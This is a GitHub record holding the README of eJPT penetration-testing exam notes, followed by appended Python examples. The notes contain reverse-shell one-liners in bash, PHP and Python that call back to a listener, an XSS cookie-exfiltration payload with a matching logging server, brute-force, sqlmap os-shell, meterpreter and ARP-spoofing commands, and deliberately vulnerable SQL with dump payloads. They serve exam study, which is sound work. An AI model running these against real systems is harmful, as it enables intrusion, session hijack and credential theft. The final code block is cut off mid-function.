{"id":19237224,"url":"https://github.com/cocomelonc/ejpt","last_synced_at":"2025-10-16T00:41:00.407Z","repository":{"id":44324780,"uuid":"351676023","full_name":"cocomelonc/ejpt","owner":"cocomelonc","description":"some eJPT exam preparation notes","archived":false,"fork":false,"pushed_at":"2021-04-29T06:36:26.000Z","size":11,"stargazers_count":71,"open_issues_count":1,"forks_count":20,"subscribers_count":4,"default_branch":"master","last_synced_at":"2025-04-01T10:36:11.958Z","etag":null,"topics":["ejpt","ethicalhacking","hacking","pentest","pentesting"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/cocomelonc.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-03-26T05:48:01.000Z","updated_at":"2025-03-26T16:59:16.000Z","dependencies_parsed_at":"2022-09-05T17:20:22.379Z","dependency_job_id":null,"html_url":"https://github.com/cocomelonc/ejpt","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cocomelonc%2Fejpt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cocomelonc%2Fejpt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cocomelonc%2Fejpt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cocomelonc%2Fejpt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/cocomelonc","download_url":"https://codeload.github.com/cocomelonc/ejpt/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositor
ies_count":250002326,"owners_count":21359095,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ejpt","ethicalhacking","hacking","pentest","pentesting"],"created_at":"2024-11-09T16:25:30.479Z","updated_at":"2025-10-16T00:40:55.375Z","avatar_url":"https://github.com/cocomelonc.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# eJPT\nsome eLearnSecurity eJPT exam preparation materials\n\n### nmap + fping\nhost discovery with fping:\n```bash\nfping -a -g 10.10.10.0/24 2\u003e fping.txt\n```\n\n
host discovery with nmap (the second form prints only the IPs that are up, which is the plain list format that -iL expects):\n```bash\nnmap -sn 10.10.10.0/24 \u003e hosts.txt\nnmap -sn -T4 10.10.30.0/24 -oG - | awk '/Up$/{print $2}'\n```\n\n
open ports scan (save to file):\n```bash\nnmap -Pn -sV -T4 -A -oN ports.txt -p- -iL hosts.txt --open\n```\n\n
UDP port scan:\n```bash\nnmap -sU -sV 10.10.10.0/24\n```\n\n
nmap vuln scan example (unsafe=1 also runs scripts that may crash the target service):\n```bash\nnmap --script vuln --script-args=unsafe=1 -iL hosts.txt\n```\n\n
nmap spoofed-source scan (-S) looped with watch, used here as a crude SYN flood example:\n```bash\nwatch -n 10 \"nmap -e wlan0 -Pn -T5 -S 192.168.0.253 192.168.0.251\"\n```\n\n
### masscan\n\nmasscan open only examples:\n```bash\nsudo masscan -p 21,22,80,8080,445,9200 --rate 64000 --wait 0 --open-only -oG masscan.gnmap 10.0.0.0/24\nsudo masscan -iL hosts.list -p0-65535 --rate 64000 --open-only\n```\n\n
### httprint\n\nhttprint banner grabbing:\n```bash\nhttprint -P0 -s /usr/share/httprint/signatures.txt -h 10.10.10.15\n```\n\n
### route\n\nadd a route in kali/parrot:\n```bash\nip route add 192.168.88.0/24 via 10.10.34.1\n```\n\n
routing table:\n```bash\nnetstat -rn\nKernel IP routing table\nDestination      Gateway         Genmask         Flags   MSS Window  irtt Iface\n...\n192.168.88.0     10.10.34.1     255.255.255.0   UG        0 0          0 tap0\n...\n```\n\n
### subdomains\nsubdomain discovery for a target with sublist3r:\n```bash\nsublist3r -d company.com\n```\n\n
## wireshark\nfilter by ip (source or destination)\n```bash\nip.addr == 10.10.10.9\n```\n\nfilter by destination ip\n```bash\nip.dst == 10.10.10.15\n```\n\nfilter by source ip\n```bash\nip.src == 10.10.16.33\n```\n\nfilter by tcp port\n```bash\ntcp.port == 25\n```\n\nfilter by ip addr and port\n```bash\nip.addr == 10.10.14.22 and tcp.port == 8080\n```\n\nfilter SYN flag (initial SYNs only, SYN/ACKs excluded)\n```bash\ntcp.flags.syn == 1 and tcp.flags.ack == 0\n```\n\nbroadcast filter\n```bash\neth.dst == ff:ff:ff:ff:ff:ff\n```\n\n
### web app enum (nc, dirb, gobuster)\n```bash\nnc -v 10.10.10.14 80\nHEAD / HTTP/1.0\n\nopenssl s_client -connect 10.10.10.14:443\n\ndirb http://10.10.10.123/\ndirb https://10.10.10.5 /usr/share/dirb/wordlists/vulns/apache.txt\ndirb https://192.168.16.33 /usr/share/dirb/wordlists/common.txt\n\ngobuster dir -u http://10.10.10.160 -w /usr/share/wordlists/dirb/common.txt -t 16\n```\n\n
### web app enum (ffuf)\n\ndirectory discovery:\n```bash\nffuf -w wordlist.txt -u http://example.com/FUZZ\n```\n\nfile discovery:\n```bash\nffuf -w wordlist.txt -u http://example.com/FUZZ -e .aspx,.php,.txt,.html\n```\n\nshow only responses with the given status codes:\n```bash\nffuf -w /usr/share/wordlists/dirb/small.txt -u http://example.com/FUZZ -mc 200,301\n```\n\nthe -maxtime flag stops the run after the given number of seconds:\n```bash\nffuf -w wordlist.txt -u http://example.com/FUZZ -maxtime 60\n```\n\nnumber of threads:\n```bash\nffuf -w wordlist.txt -u http://example.com/FUZZ -t 64\n```\n\n
### sqlmap\n\ndetermine the databases (quote the URL so the shell does not treat ? as a glob):\n```bash\nsqlmap -u \"http://10.10.10.15/?id=4\" --dbs\n```\n\ndetermine the tables:\n```bash\nsqlmap -u \"http://10.10.10.15/?id=4\" -D dbname --tables\n```\n\ndump a table's data:\n```bash\nsqlmap -u \"http://10.10.10.15/?id=4\" -D dbname -T table --dump\n```\n\ntry to get os-shell:\n```bash\nsqlmap -u \"http://10.10.10.15/?id=4\" --os-shell\n```\n\n
### xss\n\nreflection check example:\n```javascript\n\u003cscript\u003ealert(\"hack :)\")\u003c/script\u003e\n```\n\n
#### hijack cookie through xss\nthere are four components as follows:\n- attacker client pc\n- attacker logging server\n- vulnerable server\n- victim client pc\n\n\n1) attacker: first finds a vulnerable server and its injection point.\n\n2) attacker: injects the following snippet to exfiltrate the cookie kept by the victim client pc (the ip address 192.168.99.102 belongs to the attacker logging server in this example). This only works for cookies that are not flagged HttpOnly, because document.cookie cannot read those:\n```javascript\n\u003cscript\u003evar i = new Image();i.src=\"http://192.168.99.102/log.php?q=\"+document.cookie;\u003c/script\u003e\n```\n\n3) attacker: on the attacker logging server (192.168.99.102 in this example), start a listener that keeps accepting connections:\n```bash\nnc -vv -k -l -p 80\n```\n\n4) attacker: when the victim client pc browses the vulnerable server, check the output of the listener above; the cookie arrives in the query string of the request line.\n\n5) attacker: after obtaining the victim's cookie, use the Firefox add-on Cookie Quick Manager to replace your own session cookie with the victim's and take over the victim's session.\n\n\n
### bruteforce (hydra, john, hashcat)\nwordlist generation\n```bash\ncewl example.com -m 3 -w wordlist.txt\n```\n\nhydra http basic auth brute\n```bash\nhydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-head /admin/\n```\n\nhydra brute http digest\n```bash\nhydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-get /admin/\n```\n\nhydra brute http post form (the last field is the string that marks a failed login)\n```bash\nhydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form \"/login.php:username=^USER^\u0026password=^PASS^\u0026login=Login:Not allowed\"\n```\n\nhydra brute http authenticated post form (H= adds a request header, here the session cookie)\n```bash\nhydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form \"/login.php:username=^USER^\u0026password=^PASS^\u0026login=Login:Not allowed:H=Cookie\\: PHPSESSID=if0kg4ss785kmov8bqlbusva3v\"\n```\n\n
hydra brute ssh (-f stops after the first valid pair, -s sets a non-default port)\n```bash\nhydra -f -v -V -L users.txt -P rockyou-15.txt -s 2223 ssh://10.10.10.17\nhydra -v -V -l admin -P rockyou-10.txt ssh://10.10.10.18\n```\n\n
combine passwd with shadow file for john the ripper:\n```bash\nunshadow passwd shadow \u003e crack.hash\n```\n\njohn the ripper wordlist attack:\n```bash\njohn --wordlist=/usr/share/wordlists/rockyou.txt crack.hash\njohn --wordlist=/usr/share/wordlists/rockyou.txt --users=users.txt test.hash\n```\n\n
hashcat (-m must match the hash type: 1000 is NTLM, 1800 is sha512crypt $6$ as found in /etc/shadow; unlike john, hashcat wants the bare hash field, not the full unshadow line):\n```bash\ncut -d: -f2 shadow \u003e shadow.hash\nhashcat -m 1800 -a 0 -o found.txt --remove shadow.hash rockyou-10.txt\n```\n\n
### wpscan\n```bash\nwpscan --url http://10.10.10.14 --enumerate u\nwpscan --url example.com -e vp --plugins-detection mixed --api-token API_TOKEN\nwpscan --url example.com -e u --passwords /usr/share/wordlists/rockyou.txt\nwpscan --url example.com -U admin -P /usr/share/wordlists/rockyou.txt\n```\n\n
### mysql\nscan:\n```bash\nnmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.10.10.13\n```\n\nexamples:\n```bash\nmysql -h 10.10.10.23 -P 13306 -u root -p -e \"show databases;\"\nmysql -h 10.10.10.23 -P 13306 -u root -p -e \"use mydb;show tables;\"\nmysql -h 10.10.10.23 -P 13306 -u root -p -e \"use mydb;select * from users;\"\n```\n\n
### msfconsole\nsearch exploit\n```bash\nmsf\u003e search cve:2011 port:135 platform:windows target:XP\n```\n\nbasic\n```bash\nmsfconsole\nuse auxiliary/scanner/mssql/mssql_login\nset rhosts 10.10.10.110\nset rport 1433\nset username admin\nset password 12345\nset verbose true\nrun\n```\n### msfconsole examples\nmssql enum\n```bash\nuse auxiliary/scanner/mssql/mssql_enum\nset username admin\nset password 12345\nset rhosts 10.10.10.177\nset rport 1433\nrun\n```\n\nmssql payload\n```bash\nuse exploit/windows/mssql/mssql_payload\nset rhosts 10.10.10.177\nset rport 1433\nset srvport 53\nset username admin\nset password qwerty\nset payload windows/x64/meterpreter_reverse_tcp\n```\n\n
ssh login enum (brute)\n```bash\nuse auxiliary/scanner/ssh/ssh_login\nshow options\nset rhosts 10.10.10.133\nset user_file /usr/share/ncrack/minimal.usr\nset pass_file /usr/share/ncrack/minimal.usr\nset verbose true\nrun\n```\n\n
EternalBlue (MS17-010) example:\n```bash\nuse exploit/windows/smb/ms17_010_eternalblue\nshow options\nset payload windows/x64/meterpreter/reverse_tcp\n```\n\n
### meterpreter\n```bash\nmeterpreter\u003erun autoroute -s 172.16.50.0/24\nbackground\n\nsessions -l\nsessions -i 1\n\nsysinfo, ifconfig, route, getuid\ngetsystem (privesc)\nbypassuac (from msfconsole: use exploit/windows/local/bypassuac, set session 1)\n\ndownload x /root/\nupload x C:\\\\Windows\nshell\n\nuse post/windows/gather/hashdump\n```\n\n
### windows shares with null sessions\n\nenumeration with kali/parrot tools:\n```bash\nnmblookup -A 10.16.64.223\nsmbclient -L //10.16.64.223 -N          # list shares over a null session\nsmbclient //10.16.64.223/share -N       # connect to a share\n\nenum4linux -a 10.10.10.13\n```\n\n
enumeration with nmap:\n```bash\nls -l /usr/share/nmap/scripts/ | grep smb-enum-\n-rw-r--r-- 1 root root  4846 Jan  9  2019 smb-enum-domains.nse\n-rw-r--r-- 1 root root  5931 Jan  9  2019 smb-enum-groups.nse\n-rw-r--r-- 1 root root  8045 Jan  9  2019 smb-enum-processes.nse\n-rw-r--r-- 1 root root 27262 Jan  9  2019 smb-enum-services.nse\n-rw-r--r-- 1 root root 12057 Jan  9  2019 smb-enum-sessions.nse\n-rw-r--r-- 1 root root  6923 Jan  9  2019 smb-enum-shares.nse\n-rw-r--r-- 1 root root 12531 Jan  9  2019 smb-enum-users.nse\n\nnmap --script=smb-enum-users 192.168.1.10\n```\n\n
#### null sessions\n1) Use \"enum4linux -n\" to check whether the \"\u003c20\u003e\" NetBIOS name (File Server Service) is registered:\n```bash\nenum4linux -n 192.168.1.10\n```\n\n2) If \"\u003c20\u003e\" is present the host serves files over SMB, so a Null Session may be possible. Use the following command to get more details:\n```bash\nenum4linux 192.168.1.10\n```\n\n3) If a Null Session is confirmed, you can remotely list all shares of the target:\n```bash\nsmbclient -L WORKGROUP -I 192.168.1.10 -N -U \"\"\n```\n\n4) You can also connect to a share (here the administrative c$ share) with:\n```bash\nsmbclient \\\\\\\\192.168.1.10\\\\c$ -N -U \"\"\n```\n\n5) Download files stored on the share:\n```bash\nsmb: \\\u003e get Congratulations.txt\n```\n\n
### ARP spoofing\nenable forwarding so the victims' traffic still reaches its destination through you, then poison both hosts (-t target, -r also poisons the other direction):\n```bash\necho 1 \u003e /proc/sys/net/ipv4/ip_forward\narpspoof -i tap0 -t 10.13.37.100 -r 10.13.37.101\n```\n\n
### reverse shell\nbash\n```bash\nbash -i \u003e\u0026 /dev/tcp/10.0.14.22/4444 0\u003e\u00261\n```\n\nphp one-liner (spawns bash)\n```php\n\u003c?php exec(\"/bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/10.0.14.10/4444 0\u003e\u00261'\"); ?\u003e\n```\n\npython\n```python\nimport socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.14.22\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")\n```\n\n
## programming examples\nport scanner examples:\n\n[python simple tcp scan example](https://github.com/cocomelonc/ejpt/blob/master/scanner.py)\n\n[golang simple tcp scan example](https://github.com/cocomelonc/ejpt/blob/master/scanner.go)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcocomelonc%2Fejpt","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcocomelonc%2Fejpt","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcocomelonc%2Fejpt/lists"}
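Added example for the `### nmap + fping` and `### masscan` sections of the README above; this is not code from the cocomelonc/ejpt repository. The README's `awk '/Up$/{print $2}'` one-liner pulls the live hosts out of grepable (`-oG`) output; the parser below does the same job in Python and also extracts open ports, so one function handles both the nmap host-discovery pass and the masscan `-oG masscan.gnmap` output. The two `SAMPLE_*` strings are constructed, not captured scans; the field layout follows nmap's documented grepable format (`port/state/proto/owner/service/rpcinfo/version/`), which masscan reuses.

```python
"""Parse nmap/masscan grepable (-oG) output into hosts that are up and their open ports."""
import ipaddress
import re
from dataclasses import dataclass, field

HOST_RE = re.compile(r"Host:\s+(\S+)\s+\(([^)]*)\)")
STATUS_RE = re.compile(r"Status:\s+(\w+)")
PORTS_RE = re.compile(r"Ports:\s+([^\t]+)")

# Constructed sample of `nmap -sn -oG -` host discovery followed by a port scan of one host.
SAMPLE_NMAP = """\
# Nmap 7.91 scan initiated Thu Apr 29 06:00:00 2021 as: nmap -sn -T4 10.10.30.0/24 -oG -
Host: 10.10.30.1 (gw.lab)\tStatus: Up
Host: 10.10.30.5 ()\tStatus: Up
Host: 10.10.30.7 ()\tStatus: Down
Host: 10.10.30.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.9p1 Debian 10/, 80/open/tcp//http//nginx 1.14.2/, 443/filtered/tcp//https///\tIgnored State: closed (997)
# Nmap done at Thu Apr 29 06:00:30 2021 -- 256 IP addresses (2 hosts up) scanned in 30.00 seconds
"""

# Constructed sample of `masscan ... --open-only -oG`: one line per (host, port), no Status: field.
SAMPLE_MASSCAN = """\
# Masscan 1.0.5 scan initiated Thu Apr 29 06:01:00 2021
# Ports scanned: TCP(6;21-22,80,8080,445,9200) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Timestamp: 1619676060\tHost: 10.0.0.12 ()\tPorts: 445/open/tcp////
Timestamp: 1619676061\tHost: 10.0.0.12 ()\tPorts: 22/open/tcp////
Timestamp: 1619676062\tHost: 10.0.0.40 ()\tPorts: 9200/open/tcp////
"""


@dataclass
class HostResult:
    ip: str
    hostname: str
    status: str = ""                                # "Up", "Down", or "" if only a Ports: line was seen
    ports: dict = field(default_factory=dict)       # (port, proto) -> (state, service, version)


def parse_grepable(text):
    """Return {ip: HostResult} for every Host: line in nmap or masscan -oG output."""
    hosts = {}
    for line in text.splitlines():
        if line.startswith("#"):                    # header / footer comment lines
            continue
        match = HOST_RE.search(line)
        if not match:
            continue
        ip, hostname = match.group(1), match.group(2)
        host = hosts.setdefault(ip, HostResult(ip, hostname))
        status = STATUS_RE.search(line)
        if status:
            host.status = status.group(1)
        ports = PORTS_RE.search(line)
        if ports:
            host.status = host.status or "Up"       # a Ports: line means the host answered
            for entry in ports.group(1).split(","):
                fields = entry.strip().split("/")   # port/state/proto/owner/service/rpcinfo/version/
                if len(fields) < 7:                 # malformed entry, skip it
                    continue
                port, state, proto = int(fields[0]), fields[1], fields[2]
                host.ports[(port, proto)] = (state, fields[4], fields[6])
    return hosts


def hosts_up(hosts):
    """IPs with Status: Up, sorted numerically (same result as awk '/Up$/{print $2}')."""
    return sorted((h.ip for h in hosts.values() if h.status == "Up"), key=ipaddress.ip_address)


def open_ports(hosts):
    """(ip, port, proto, service) for every port in state open; filtered/closed ports are dropped."""
    found = [(h.ip, port, proto, service)
             for h in hosts.values()
             for (port, proto), (state, service, _version) in h.ports.items()
             if state == "open"]
    return sorted(found, key=lambda t: (ipaddress.ip_address(t[0]), t[1]))


if __name__ == "__main__":
    for sample in (SAMPLE_NMAP, SAMPLE_MASSCAN):
        parsed = parse_grepable(sample)
        print("\n".join(hosts_up(parsed)))          # exactly what you would feed to nmap -iL
        for ip, port, proto, service in open_ports(parsed):
            print(f"{ip}:{port}/{proto} {service}")
```

Note that `443/filtered` is deliberately excluded by `open_ports`: a filtered port tells you a firewall is in the path, not that a service is listening, so it should not end up in the list you hand to `-sV -A`.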
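Added example for the `### sqlmap` section of the README above; it is not code from the cocomelonc/ejpt repository. It shows what sqlmap is exploiting behind a URL like `http://10.10.10.15/?id=4`: a lookup that concatenates the `id` parameter into SQL, next to the parameterized version that stops it. The three payloads are hand-written equivalents of what `--dbs`/`--tables` (schema enumeration) and `--dump` (reading another table through a UNION) automate. The backend is an in-memory SQLite database with constructed rows, so everything runs offline; `sqlite_master` plays the role MySQL's `information_schema` would.

```python
"""Vulnerable vs. parameterized lookup behind ?id=4, with the UNION payloads sqlmap would derive."""
import sqlite3
from urllib.parse import urlsplit, parse_qs

# Payloads that go into the id parameter (percent-encoded when sent in a real URL)
TAUTOLOGY_PAYLOAD = "4 OR 1=1"
TABLES_PAYLOAD = "0 UNION SELECT 1, name, sql FROM sqlite_master WHERE type='table' ORDER BY 2"
DUMP_PAYLOAD = "0 UNION SELECT id, username, password_hash FROM users ORDER BY 1"


def build_db():
    """In-memory database standing in for the target's backend (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, price REAL);
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO products VALUES (1, 'lamp', 9.5), (2, 'desk', 120.0), (3, 'chair', 45.0), (4, 'mug', 3.25);
        INSERT INTO users VALUES (1, 'admin', 'c0ffee01'), (2, 'bob', 'deadbeef');
    """)
    return conn


def id_from_url(url):
    """Extract the id query parameter the way the vulnerable page would (percent-decoding included)."""
    return parse_qs(urlsplit(url).query).get("id", [""])[0]


def product_vulnerable(conn, id_param):
    """VULNERABLE: the parameter is concatenated into the statement, so SQL in it is executed.
    With TABLES_PAYLOAD the UNION must match the three columns of the original SELECT; sqlmap
    finds that column count for you with ORDER BY / UNION SELECT NULL probes."""
    sql = "SELECT id, name, price FROM products WHERE id = " + id_param
    return conn.execute(sql).fetchall()


def product_safe(conn, id_param):
    """Hardened: validate the type, then bind the value; it can never change the query's structure."""
    try:
        product_id = int(id_param)
    except ValueError:
        return []
    return conn.execute("SELECT id, name, price FROM products WHERE id = ?", (product_id,)).fetchall()


if __name__ == "__main__":
    conn = build_db()
    print(product_vulnerable(conn, id_from_url("http://10.10.10.15/?id=4")))  # the intended single row
    print(product_vulnerable(conn, TAUTOLOGY_PAYLOAD))   # every product: boolean-based injection works
    print(product_vulnerable(conn, TABLES_PAYLOAD))      # table names + CREATE statements (--tables)
    print(product_vulnerable(conn, DUMP_PAYLOAD))        # the users table through the UNION (--dump)
    print(product_safe(conn, TAUTOLOGY_PAYLOAD))         # []: the payload is rejected as not an integer
```

`product_safe` is stricter than "just use bind parameters": the `int()` cast also rejects the input outright, which is the right call for a numeric key. For a text parameter you would keep the bound `?` and drop the cast; binding alone is what prevents the parameter from being parsed as SQL.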
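Added example for the `#### hijack cookie through xss` procedure in the README above; it is not code from the cocomelonc/ejpt repository. The README's step 3 uses `nc -vv -k -l -p 80` as the logging endpoint and leaves you to read the cookie out of the raw request line. This is a Python stand-in for that `log.php` listener: it assumes the README's payload (an `<img>` whose `src` is `http://<logger>/log.php?q=` + `document.cookie`), so the cookie string arrives percent-encoded in the `q` parameter, parses it into name/value pairs, answers with a real 1x1 GIF so nothing looks broken on the victim's page, and adds the `Set-Cookie` check that decides up front whether the attack can work at all. The request targets and headers used for illustration are constructed.

```python
"""Logging endpoint for the cookie-exfiltration XSS: the Python equivalent of log.php / nc -l -p 80."""
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit, unquote_plus

# Minimal 43-byte transparent GIF: the <img> beacon completes like a normal image load
PIXEL_GIF = bytes.fromhex(
    "47494638396101000100800000000000ffffff21f90401000000002c00000000010001000002024401003b"
)
LOG = []  # exfiltrated cookies, one dict per victim request


def query_param(target, name):
    """Percent-decoded value of `name` from a request target such as '/log.php?q=...'.
    Splits only on '&', so the ';' inside a serialized cookie string survives intact."""
    for pair in urlsplit(target).query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote_plus(value)
    return None


def parse_cookie_string(raw):
    """'PHPSESSID=abc; user=bob' (document.cookie format) -> {'PHPSESSID': 'abc', 'user': 'bob'}."""
    jar = {}
    for part in raw.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            jar[name] = value
    return jar


def cookies_from_request_target(target):
    """Cookies carried by one beacon request; {} when there is no q parameter (favicon, probes)."""
    raw = query_param(target, "q")
    return parse_cookie_string(raw) if raw else {}


def readable_by_script(set_cookie_header):
    """False when the server flagged the cookie HttpOnly: document.cookie then never contains it,
    so this exfiltration path is closed for that cookie and you need a different angle."""
    attributes = [attr.strip().lower() for attr in set_cookie_header.split(";")[1:]]
    return "httponly" not in attributes


class ExfilHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        cookies = cookies_from_request_target(self.path)
        if cookies:
            entry = {"src": self.client_address[0], "referer": self.headers.get("Referer"), "cookies": cookies}
            LOG.append(entry)
            print(f"[+] {entry['src']} {entry['referer']} {cookies}")
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.send_header("Content-Length", str(len(PIXEL_GIF)))
        self.end_headers()
        self.wfile.write(PIXEL_GIF)

    def log_message(self, *args):   # keep stdout for the captured cookies only
        pass


if __name__ == "__main__":
    # Same role as `nc -vv -k -l -p 80` on the logging server; port 80 itself needs root, so 8080 here.
    HTTPServer(("0.0.0.0", 8080), ExfilHandler).serve_forever()
```

Run `readable_by_script` against the `Set-Cookie` header from the vulnerable server before bothering with the injection: if the session cookie is `HttpOnly`, the README's payload will beacon with an empty `q` and the listener will log nothing.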
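Added example for the `### ARP spoofing` section of the README above; it is not code from the cocomelonc/ejpt repository. `arpspoof -t 10.13.37.100 -r 10.13.37.101` works by sending each host an unsolicited ARP reply that claims the other host's IP is at the attacker's MAC. The block builds exactly that frame with `struct` (no raw sockets, nothing is sent), parses it back, and runs the detection a defender would: any IP claimed by more than one MAC in ARP replies is being poisoned. The IPs reuse the README's scenario; all MACs and the frames in `SAMPLE_FRAMES` are constructed.

```python
"""Build the unsolicited ARP replies arpspoof sends, and flag them in a list of captured frames."""
import struct

ETH_P_ARP = 0x0806
ARP_FMT = "!HHBBH6s4s6s4s"   # htype, ptype, hlen, plen, oper, sha, spa, tha, tpa (28 bytes)

# README scenario: attacker on tap0 sits between these two hosts (constructed MACs)
VICTIM_IP, VICTIM_MAC = "10.13.37.100", "66:77:88:99:aa:bb"
GATEWAY_IP, GATEWAY_MAC = "10.13.37.101", "00:11:22:33:44:55"
ATTACKER_MAC = "de:ad:be:ef:00:01"


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def ip_bytes(ip):
    return bytes(int(octet) for octet in ip.split("."))


def fmt_mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def fmt_ip(raw):
    return ".".join(str(b) for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an ARP 'sender_ip is-at sender_mac' reply, unicast to target_mac.
    arpspoof sends this with sender_ip = the host it impersonates and sender_mac = its own MAC."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack(ARP_FMT, 1, 0x0800, 6, 4, 2,          # Ethernet, IPv4, 6-byte MAC, 4-byte IP, reply
                      mac_bytes(sender_mac), ip_bytes(sender_ip),
                      mac_bytes(target_mac), ip_bytes(target_ip))
    return eth + arp


def parse_arp(frame):
    """Decode an Ethernet+ARP frame into a dict; None for non-ARP or truncated frames."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    _, _, _, _, oper, sha, spa, tha, tpa = struct.unpack(ARP_FMT, frame[14:42])
    return {"op": {1: "request", 2: "reply"}.get(oper, "other"),
            "sender_mac": fmt_mac(sha), "sender_ip": fmt_ip(spa),
            "target_mac": fmt_mac(tha), "target_ip": fmt_ip(tpa)}


def detect_spoofing(frames):
    """{ip: set_of_macs} for every IP claimed by more than one MAC in ARP replies.
    A healthy segment has one MAC per IP; two claimants means someone is poisoning caches."""
    claims = {}
    for frame in frames:
        arp = parse_arp(frame)
        if arp and arp["op"] == "reply":
            claims.setdefault(arp["sender_ip"], set()).add(arp["sender_mac"])
    return {ip: macs for ip, macs in claims.items() if len(macs) > 1}


# Constructed capture: two legitimate replies, then the two poison replies `arpspoof -t ... -r ...` emits
SAMPLE_FRAMES = [
    build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
    build_arp_reply(VICTIM_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP),
    build_arp_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),    # tells the victim: gateway is at attacker
    build_arp_reply(ATTACKER_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP),   # tells the gateway: victim is at attacker
]

if __name__ == "__main__":
    for ip, macs in detect_spoofing(SAMPLE_FRAMES).items():
        print(f"[!] {ip} claimed by {sorted(macs)}")
```

The `-r` flag is what produces the fourth frame: without it only the victim's cache is poisoned and return traffic from the gateway bypasses you, which is also why `ip_forward` must be on before arpspoof starts or the victim simply loses connectivity.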
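Added example for the `## programming examples` section of the README above (not the `scanner.py` that the README links; this is new code written for this page). It is the Python analogue of `nmap -Pn -sV -p <ports> <host>`: a threaded TCP connect scan that distinguishes open, closed (RST) and filtered (no answer) ports and grabs the greeting banner from services that speak first, the way `-sV` does for SSH, FTP and SMTP. Because a scan needs something to scan, the block also starts a loopback service with a constructed banner so it can be run and checked offline; everything stays on 127.0.0.1.

```python
"""Concurrent TCP connect scan with banner grab, plus a loopback service to test it against."""
import socket
import socketserver
import threading
from concurrent.futures import ThreadPoolExecutor


def scan_port(host, port, timeout=0.5):
    """Return (port, state, banner). state is 'open' (handshake completed), 'closed' (RST received)
    or 'filtered' (no answer within timeout, typically a firewall dropping the SYN)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
    except ConnectionRefusedError:
        sock.close()
        return port, "closed", ""
    except OSError:                      # timeout, host unreachable, ...
        sock.close()
        return port, "filtered", ""
    banner = ""
    try:
        # Services like SSH/FTP/SMTP greet first; HTTP stays silent until asked, so the recv just times out.
        banner = sock.recv(256).decode("ascii", "replace").strip()
    except OSError:
        pass
    finally:
        sock.close()
    return port, "open", banner


def scan(host, ports, workers=64, timeout=0.5):
    """Scan `ports` concurrently; returns {port: (state, banner)}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = pool.map(lambda p: scan_port(host, p, timeout), ports)
        return {port: (state, banner) for port, state, banner in results}


def list_open(results):
    return sorted(port for port, (state, _banner) in results.items() if state == "open")


class _BannerHandler(socketserver.BaseRequestHandler):
    def handle(self):
        self.request.sendall(self.server.banner)


def start_banner_server(banner=b"SSH-2.0-LabServer_1.0\r\n"):
    """Loopback TCP service that greets every client with `banner` (constructed); returns (server, port)."""
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), _BannerHandler)
    server.banner = banner
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def free_closed_port():
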